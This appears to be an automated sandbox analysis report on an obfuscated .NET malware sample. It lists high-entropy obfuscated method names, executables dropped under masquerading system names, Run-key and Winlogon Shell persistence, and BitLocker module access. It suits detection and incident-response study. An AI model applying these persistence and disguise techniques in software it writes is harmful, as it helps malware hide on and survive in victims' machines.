                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, hHAK4hoFqEn0ZG3umO9.csHigh entropy of concatenated method names: 'hqCUaUqC52', 'oAeVMr4xn3TWtJncqEhq', 'JyXmOb4xtJTROGyc4Oh7', 'WqcMZT4xu9kSGGgjFtD7', 'WtVXkQ4x2Plp9W7iO965', 'XgO5vC4xFwPmAd0q9lMk', 'v1JGR04xK84JIGtSb43i', 'UGJST84xJKvlImA6LpC3', 'JOOjcx4xkMpMeCdOemc5', 'q4OUboIu5f'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, hx02alMKuc6rw2H1lMp.csHigh entropy of concatenated method names: 'vykMkAQT9p', 'OlGM7A5QTf', 't9yMSwTbcM', 'IcLMzmM1V9', 'Vik0bnpKUC', 'i4Q04MVJrn', 'qah0oaT5hR', 'e87D0743ZPRuvyCBruip', 'cby2U043jeMcf2iRq7Qm', 'T3UkZe43XBI3t0KdeQuT'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, tuHYGwP5QOuUUGKYdl9.csHigh entropy of concatenated method names: 'FWXPpYdsVF', 'iANPCokEG8', 'WfHPH53qM6', 'ty1PfuITev', 'rCQPLXR1ff', 'StePOx5Qjj', 'OXOPq9QWFg', 'PpnPF1x12m', 'z2dPKRGt0s', 'Nv5PncoV6t'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, pJZAdchv6iucSg0IgON.csHigh entropy of concatenated method names: 'ihEiDxHrdo', 'hQLieRFRTA', 'mypVd74GV38G428qYtLi', 'rHvs4t4GPMDXfL16QaUF', 'aQKh1Q4G8QMCuvDsWiqE', 'vfVGJx4G3auEl30Z6imm', 'J73iQU4GgpGXCQvZQM35', 'lBhiimpJWG', 'CkRnai4GrtR003V6ni0n', 'LBbnlB4GTZlfX7O95hHw'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, hhH2kfa41p1RK5mKhwA.csHigh entropy of concatenated method names: 'xDpaUfChKb', 'Qj7ayJPvi7', 'HljaMBWXaZ', 'RiOS6c4gyKie6lYeHoOx', 'FrOIkf4goFjUlXA1iQT3', 'PqIGOk4gU1gsmVWsUaHA', 'foD2q54gM8ageeD4dmnM', 'srZ47j4g0mvL4IooNuW4', 'xwpAvA4gaJoJ3P9hWsao', 'WrMVGe4gR4Oddt8V4sby'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ct8JiX9WdC7BriZe3sD.csHigh entropy of concatenated method names: 'FnD999ikW0', 'Lno9APIlV8', 'VOl9EwyCqc', 'HTD9xTEhaN', 'FmW9PbvEGi', 'h91kIa4HwD0mjUBUARaB', 'XEabQ14HpkqvaRtSNfhx', 'NyXUt74HCrGqncQS2FSb', 'WSg5qc4HHPN83EuARWuM', 'BAQX3c4Hfx5VYUdBIMNx'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, HJcR64XeVlp4Gqe46r9.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'tqsiLj4TPOjPttvZg7FI', 'tQuLuZ4T8fxiS7K2SfuC', 'jH6bMT4TVxE1r3ovi25A', 'QaiXI2oWk6'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, CSTOxBWYpawGbl83390.csHigh entropy of concatenated method names: 'uoTWVk3tCe', 'zQwWj9rVC4', 'J5PWDP3Rs5', 'H2gWeVSGOG', 'YNeWhoVIWs', 'e5PWIkWbHn', 'DsnWs590tJ', 'RVkWl9f04Z', 'fXiWQhlfC1', 'YFZWisNyFF'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, RJr2tURYI0Xfy3KxpIw.csHigh entropy of concatenated method names: 'WFIRjIFGBX', 'n0wRDWMHKy', 'eUgReZXkTP', 'g8X6p841sr2jiUKfDGgd', 't9CblC41lixP31xiUcWb', 'Bf83Uj41hjdve3wrKqbG', 'z03qI241IJMXMeVMMe0C', 'WtKnxX41QYANauNm908F', 'YGGHfp41i0Wi52jcTcGy', 'WgOZNf41d4Gtxh2DgXJm'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, pZLv76aV1IdZCZRATxB.csHigh entropy of concatenated method names: 'yEWagRsMrk', 'o7Oa1e9Z1C', 'rK6EJZ4gHcGyWpZfNPgm', 'RyjwsU4gptvWepjruhkn', 'd0IhCA4gC9UFxM6iyYtH', 'KhW0304gf5JE1QeSXjfw', 'WdmiTR4gLXDF6HSYocBA', 'MGctUV4gOhZplSX7dKv5', 'vtCPhh4gqtYKh6PlOk2v'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, SuSVZey9tV57fBRHKKj.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'tto4RU5GbcX', 'e2i4y4tjFj5', 'dRbeHR48votUdkbjUHDB', 'U6c19k48WjHoAMRDNJuG', 'fy4pSP486bDuoseGj0LF'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, nIDB2DodYZJnuXZ0WuE.csHigh entropy of concatenated method names: 'uXZomMvhlc', 'wnvovNmJaf', 'iGNPwK4xdA24wu78QQMu', 'GWFL654xQn2X5U81MM6Z', 's6tN3t4xiSEcqw6URlKL', 'UQFvGN4xcHw3TEvbhTSD', 'HJXYjU4xm3rTVOL94pcW', 's5YRL14xvf1CVvX8L4RG'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, YTM1eOawj8WhaLbGhkT.csHigh entropy of concatenated method names: 'rZta2YfL33', 'Ws2aJfmmaZ', 'FQIQRH41UVkpuvirPF0F', 'PxFaFW414USh3LsXDMFm', 'kSyrfn41oxnVUFPk06Xk', 'rAfwa041ysXaUEuvhjVN', 'x6paCT5B7E', 'v6HaHYTQnb', 'rISafm0O8A', 'P2vaLUpPL5'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, dbPnUjcZHLPsquDvRga.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'Uvk4RmJw3Ta', 'SZ74RvcsxYG', 'chuvrR4wpabnoM8L1Pbo', 'EeWBRu4wCc6jYC1ixsQy', 'jLRTXv4wH4yu5BPbihHp', 'sRZqLk4wfQEF66hnOGxd', 'DnpUk24wL7A2Tf6HcwH3', 'JKfPg24wOf4dnOMOB5q4'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, YtD94Vzpt1VlhJ0NWF.csHigh entropy of concatenated method names: 'PE144cEKU8', 'MaS4UoXdZT', 'hkn4ymiT2W', 'IGV4MrJ8oV', 'g41407xDoV', 'dbH4aeOjjI', 'llU4XTiTbS', 'R6WIvo4EyFEkE5SV0ss3', 'OAPf4y4EMxVQnpuPQMmN', 'SqKm8g4E0mywSUwb6s4b'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, wpH16jEUXH1BT5jsrLJ.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'eagEMh3hY3', 'Write', 'nVZE0QiuoR', 'WxSEaMSbcQ', 'Flush', 'vl7'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, P61AaLWK3hElMl6x9fl.csHigh entropy of concatenated method names: 'ziGWtp05eF', 'TIGWuFYjcb', 'rDSW2TrdYG', 'PpYWJ41Th7', 'tKeWkqo9Zp', 'DiKQXK4CB4fahvj798Bl', 'tmCCKL4CGkORkpWwUvCA', 'JtkhuI4C5FSqkLbwdHdp', 'fCaZCi4Cwg4w53F35hAo', 'tKWcCW4CpqqdBRtxGaqk'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, UFdjLwtrHEW4mNGqbb5.csHigh entropy of concatenated method names: 'NfR4RA8TQBm', 'Pk0409xCXPI', 'raii5v4JoPIcxlkqpaEX', 'WXfbTv4JbFtejHoMTodS', 'GkaqIM4J4hWXMrKe0q11', 'w4dwHO4JUjYPyUk4fL5r', 'tKoKvf4Ja4lFCfTAUmOr', 'FIsy3L4JMHnytVEyh3II', 'PSI8l04J08oaCEfYdBSk', 'JIOtYw4JRA72XmktDUrb'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Y9HuZGMCVvJKoVekNlu.csHigh entropy of concatenated method names: 'GcLMq6S3cu', 'mgbcSf4VzvMOwLw6qE70', 'MsoDZA4V7p2N4PWTJOgQ', 'xAtjMH4VSU5GhdtinDeR', 'MDkHXM43bHrZi3ExR7Mu', 'MwqmQe434hC35vFpGSgR', 'U1J', 'P9X', 'yEl4yI71Z8e', 'YBQ4ysEJgqS'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, cnCX4hPVFeA2vHp4QfZ.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, dvJa7r3cctN5qPfM5BG.csHigh entropy of concatenated method names: 'NpdgeFexwe', 'EWRCVi4FpiXRO7EOpYTm', 'l5J2Of4F5tRnUonUTdjV', 'CWB8Z74FwkYfLgn7rUxL', 'ODA7tx4FCcwyHYmitBM5', 'kt5', 'vfH3v7fHoo', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, H3JNOiJbdgZE5oy0eoW.csHigh entropy of concatenated method names: 'Lc0Jy9SaZY', 'EXXJMtcYTx', 'uFsi7s4kNaOxCR5HhMs3', 'VeU6GL4krTQdOK2PknVL', 'WuiuDx4k1AOJhQ956KTx', 'ToS7Hk4kT7BoBHBUxfYQ', 'C5pFqX4kBZdq077VcQyb', 'wiLfp04kGwmuX6X1quHA', 'dgIJolKBu0', 'JYxmwZ4k35nJjebygM0E'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, HMHoigNJgtJHL9PK0N4.csHigh entropy of concatenated method names: 'b76', 'method_0', 'q7Q', 'K41', 'vEh', 'pu6', 'Xk4', 'K81', 'YV4', 'method_1'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, o8BhObPR6XETyImrIcA.csHigh entropy of concatenated method names: 'WrWPYUV5E3', 'iY8PZJ3H6s', 'LpdPjObg2n', 'goSajw4LJLORex7V7yqk', 'hEyvJO4LukB5PUihAvI2', 'TXfvhW4L2UKjqsfNy2lb', 'tc3AZD4LkUfsl6Ue6dEj', 'd4uHWi4L7e0axteRgMcT', 'FPQhEB4LSL7cT2NMG3rC'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, ql9tVhoV7BPF4tmQ4tI.csHigh entropy of concatenated method names: 'hnHowsHek5', 'gM1opwKeLn', 'kfgqBD4x81fATEpp4Ukb', 'gYcmUl4xxgiaR5h0d2OJ', 'oNpBhB4xPL38O0DQCprf', 'dJwnL14xVQL4dV0rFiFN', 'qVFoLu8DER', 'Rm0sMk4xTQlD3LrnQT44', 'ild3cg4xNKkU5KZ71mhx', 'jW3kqc4xgpmfZdGFDW2b'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, WvLov4iBrxJryiX4WTe.csHigh entropy of concatenated method names: 'MI0ifqR3Y1', 'R8PiLJMuVr', 'k1DiOT7vTY', 'vcJG4e45UqAYIfrJWAty', 'oB4quv45yMpFwRqGUGvX', 'L1L2dd454xBbay6q829s', 'uUUPhm45otV7drhTNS5g', 'pn4i5PnyGu', 'F0giwYwgya', 'Qx7ipTGU6x'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Y02CwXxSseGNgDAEDqk.csHigh entropy of concatenated method names: 'jDhPbnMdxU', 't1VP4vDsrO', 'GpWPoRk726', 'dCwPUMnoLY', 'a26PyhgwNl', 'U1mPM5LH7U', 'mj7ITY4LLEIHjyr08qNc', 'euALSP4LHEgFCQewjf8X', 'erl5hc4LfPuIrhT8foCu', 'QDo0Q84LO0y6cMyrJ9dF'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, vdt507l94vMmVcT2u3.csHigh entropy of concatenated method names: 'c9n1WEjMs', 'VUjdNF4APcOb4tV8clVJ', 'F8nIhZ4A815g3LmD8f4T', 'VsNiSBQUF', 'nDYduOyMi', 'enjc52DxL', 'w68mNdVFx', 'apTvvIXfD', 'QWNWquhKV', 'mn46D6Myu'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, JvLKWFxn1AwUlsQB3c8.csHigh entropy of concatenated method names: 'b0DxucjqN7', 'fkpx2wBZEo', 'VjKxJt49yF', 'DH2xkhW92v', 'x2dx7y2EMl', 'yW5keC4LBeR8710yO6cd', 'sNqOKZ4LNdpSO1R3hte9', 'aniUxa4Lrls2jEuDmSDU', 'X20dS84LGeTwoy4E0sU1', 'ieTYVd4L5ZIWnwjmFQ0N'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, GIXXWeUFuQGhavs5PT0.csHigh entropy of concatenated method names: 'kN8yUVd8H1', 'bItyyicSxf', 'aAyyMudmdW', 'CgSv5W4Pzx1WqABhCL4S', 'duMYts48b5DiukbChCBl', 'c9hOtn484RX5p0gh6EEJ', 'BfkyZQKf1A', 'oCWRo348MjbqiLpDTPmP', 'AUsMir48UbHLngkJRv2U', 'vTSmjK48yCngGvIehjWj'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, DKyRIlyGfAqlDrsZ4nQ.csHigh entropy of concatenated method names: 'BqZy7SQWFB', 'VlgLZt4V46FUlIZE6q5T', 'qIZxsx48zI3AO1mw7DIJ', 'EdFGYv4Vb3TPpGm3FZXx', 'mw02L44Vod7CYi8EauJU', 'zrYSMG4VytQjp8KxeE5W', 'FV7TO24VMryfVeyFHa8K', 'R6jvmf4V0bZR4uQIoXCH', 'KlYM0v0yue', 'gFovLR4VYHJBBXSBECJ4'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, nMUNmhRmA7CLNA51YRj.csHigh entropy of concatenated method names: 'PUtRWd5IVZ', 'sQtJOL41gsTmB9uQHdNu', 'HegUGa411EpRhGGLF2cg', 'XYTon741ToBD5Cokb6a3', 'IdJPFr41NiMnaLvwvmep', 'pD9AEG41VwnMbZ2rRudI', 'BGaHnx413dSa8gl6DMI0', 'qJ4mKL41riwGISC5aVQF'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, W3g2avGVc5rO8B8tHXX.csHigh entropy of concatenated method names: 'Jm2GgnnQIa', 'rkuG1CWklC', 'uLVGTkxfYc', 'DAHGNvpFd3', 'qCHGr0DjyN', 'eCmGBTr85t', 'IERGGrn7cp', 'nf6G5PpYLp', 'FiVGwQFBXP', 'NpvGpjE1i8'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, SZeFJ7it6OlvXGYMHfc.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'aBb4RDoS9DH', 'xMh4yfV8kPN', 'qDHscK45eyM3pKAZRgj5', 'zM07tO45hgaioG5WOSDO', 'i5AMFJ45IywxU1XaoGYc', 'S9Yq9q45sO0tbMb10PgX', 'wcZStZ45lVMonmYrqti1'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.csHigh entropy of concatenated method names: 'QJ9HxW4kkAZ83UJyDASW', 'iurcFR4k74VAdxapIulJ', 'Rvvktx8MTS', 'C6IVjw474OSaSLTOqINa', 'uuf1fI47oV8ED5bAaWbP', 'Ymkb3e47UDBsHMQ3OvZk', 'M6mQok47ylWI0L3l7IfC', 'pmnw1i47MSLtO9esL09p', 'rTE3Nl4709FKmoTGdroU', 'N5ZHTL47aJcpJBm8L8Xs'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, MoRx0REwCrWeXvft26u.csHigh entropy of concatenated method names: 'ijiE7r7Kck', 'UvPEzLZCP8', 'dxVECX1uJK', 'jGtEHEJtl7', 'MPKEfb0AGB', 'HI8ELv3a2Z', 'IEhEO2wiqJ', 'RNXEqarJ1r', 'pF4EFn3yaR', 'HEmEKTNyH6'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, IJGh6nxfAg4SQk0kpGq.csHigh entropy of concatenated method names: 'M1UxOaWyJJ', 'ECjxqPHyd3', 'X0sxF0Lbr6', 'l4DsTI4LPBMS3Qm550MY', 'zvrmwr4L8wYswingc2Xe', 'i9O6ef4LVq4Lr4hpip42', 'OclwDp4L3Bt1WYqAuGRB', 'RRk3o34LgkEdSunRXfuH', 'PPwhYX4L15C9AswjNIo5'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, rGjcx6MG7BX7UDSlda8.csHigh entropy of concatenated method names: 'q64', 'P9X', 'hSy4yeNnget', 'vmethod_0', 'M914R0WEOgV', 'imethod_0', 'JqQCjh4VLOiGcOqKylQP', 'pJlUU74VOPUGSui6wogP', 'OB1rXB4Vq65ZnOkbMTsL', 'WdgNFJ4VFN6W8GSZLnC4'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, njOwdSd2K9SjyD52Wmf.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'wBUdkRhUVo', 'HAX4RQFMWZh', 'RhAC1c4w9PwFajtS01Su', 'iW2bDk4wWbmrWdOYlssK', 'drsDsX4w6gyjYZo7045s', 'X1y6lI4wAMEPXenVBhOB', 'wOvLJQ4wEEHrfIyCk0Fq'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, JGATs0REhlQFEGLX1u2.csHigh entropy of concatenated method names: 'CG6RP2fe7G', 'huQR84LUGA', 'IfiRVoSZNj', 'tk3R36wspU', 'IouRgALyPL', 'idZR1mu1Cy', 'yRuERY41HglOYoFuIScf', 'H1cYVk41fbLwuPk7lRiS', 'KEvmPN41LRwgUbwQXNHt', 'pkMvbv41OgJdMeGoTnda'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, qDbss6M1tafVf6wFoyb.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'MXS4yZlm9TM', 'vxnMNO28qE', 'imethod_0', 'Qcl54S4VB0yRhWdExF8U', 'a6KUDo4VGT2WiKlGEuaN', 'IQjyL74V59GUaF2NAURe', 'xbfayV4VwZAyZ4YYfV6i'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Ri3wCCRfkaT15dY2xWG.csHigh entropy of concatenated method names: 'NgIR2RCSIX', 'm4Ugiw4T0Cmpu2erxVWQ', 'KAKj1j4TyhOMSTb2aK91', 'DVaZ7w4TMg6itW8fT2OQ', 'Puu4Kj4TakfLSxZKmoHR', 'b4R7A64TRT5XOxJhvQhD', 'P9X', 'vmethod_0', 'yNW4yEBpo7m', 'imethod_0'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, rgO3XvBXAsyxQIeA4hu.csHigh entropy of concatenated method names: 'k5HB68kBgA', 'Ur1cnx4t06AIcLqNZBEh', 'EqDwUq4taHWrC2FqfIAp', 'fMrqOd4tyrCKi0sFuxs3', 'Hdr5Wb4tMfDCofyZ2dPv', 'dobXK84tRj2ZpmpN8LCJ', 'IPy', 'method_0', 'method_1', 'method_2'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, uooY65gFmre5mX3ZUxv.csHigh entropy of concatenated method names: 'RbLgnUBbjS', 'k6r', 'ueK', 'QH3', 'TxigtDjSdc', 'Flush', 'XLIguyf5js', 'huvg2KmFQ5', 'Write', 'gFVgJoW0bF'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, kLACCO8yTXsPlfqEDbr.csHigh entropy of concatenated method names: 'nXI80s3JKv', 'xce8ahA882', 'up38RFUJM7', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'Ams8XBBo3H'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, N97fqbXoKtEhvohd0ls.csHigh entropy of concatenated method names: 'ChZXyqe7kT', 'suxXMaWN9T', 'hN3X0RdnwV', 'AbkXadEYcg', 'a3bXRdUmRd', 'vjJXXrGYRC', 'hiBXY8IQuZ', 'Q5sXZ5Hxu6', 'uGDXjiUNYn', 'YS4XDwUrFE'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, EWhPj5tVQwL5eKyDfiu.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'mXvtgpqMJe', 'aJ3txj42E8IUR7IMMO3d', 'lhwWfj42xgGr0CEJ5Tvk', 'rpWEPQ42PiLBNRYQCZGv', 'NPDgLB428cKlXJ5rjY6Q', 'M9YlXo42VSZDkIKKmKIP', 'OGxaAX423oLe9qNHpR3h'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, WC2lhc8S7cJvRYRUBOT.csHigh entropy of concatenated method names: 'UnpVbMFs4k', 'OZyV4vlegn', 'Yd7', 'WFJVoVFRlc', 'MheVUY805P', 'IjoVymANAn', 'VGQVMRUcJr', 'FR8kyx4qFqQh9gDm50ms', 'RC5XVu4qOPWvFQ56BnyG', 'eR1cHD4qqUwFwUGuKbX4'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, bQLWk61FTUsNnSNAEv9.csHigh entropy of concatenated method names: 'mrWYTB4KJAYyPNkD7W4Z', 'UyBOr84KuTDUNToABqQS', 'lo31eV4K2JqbraCDTDdA', 'Qqcigp4Kk2MP3myb5CbN', 'ric1nNsD02', 'Mh9', 'method_0', 'pJZ1tfEl2W', 'vyH1ukjtsm', 'hIy12aTx8l'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, BF6Gx98HUHImTRJaW91.csHigh entropy of concatenated method names: 'QOO8Lp7xqb', 'CpP8OVEiCH', 'jqN8qeavho', 'pfh8FAwPIf', 'gV48KMDEZw', 'q0i2La4qNpss7yI7TI7P', 'D4Nl5X4qrfOh94LyRBmY', 'Mhb6QG4q1qJcnFMpOSaH', 'bAGiar4qTBsYHQedM4q8', 'Lne4BA4qBgtPu2jemuHC'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, zTDs9RXWDtQwJonRDT3.csHigh entropy of concatenated method names: 'M3MSNH4r91pe0Etk2Xc7', 'RdUitp4rWIo7w7P5x9S7', 'OCH1HD4r6mU5o7lOXIN3', 'rwj0xL4rA3rmvZGeW5vr', 'lDteSPk2Aw', 'eGBGGK4r8Sy0hdEtkm1T', 'Ks0Li04rxLiZ1a3S78Nb', 'NZ6dT04rPTyjoLRdLkAi', 'u68X0p4rVaVYi1En3MlB', 'nNEH8X4r3QqYvWQUH753'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Y690dnaNKj7VmGqmEMb.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'Q484yWFRAZD', 'U9g4RZ7kg9C', 'imethod_0', 'kafBoo4gtFNWAlAR7orj', 'a2oE9W4gu4iTmellDKJF', 'WB6M9B4gKU2c01mO6oiY', 'xEHj7d4gn4HWQcPvqi2f', 'SQoQvK4g2Jr3aWwHLd1B'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, orHqMF0wMBUA0rkqlRP.csHigh entropy of concatenated method names: 'Nc502YOsBJ', 'bgG0JC2opI', 'GxR0kMLco1', 'KNxUK943zmOu7cTIXJTY', 'tUy9564gbG03ndRkrisX', 'Y0KHQE437pvSopn0YJvW', 'HFLlys43SfkRRYJVL3Nn', 'QsF0CkRJZr', 'djJ0Hi6VI1', 'cBY0fW9PwM'

                          Persistence and Installation Behavior

                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; File created: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Program Files (x86)\Windows Media Player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Users\user\Desktop\HnmxfGsC.log
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Users\user\Desktop\ynMPgItS.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Users\user\Desktop\yEThvdnU.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Users\user\Desktop\fsrbbHSF.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Users\user\Desktop\WJYLrfNX.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Users\user\Desktop\oWARLBim.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Users\user\Desktop\MaEvHCHq.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; File created: C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe

                          Boot Survival

                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIi
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIi
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
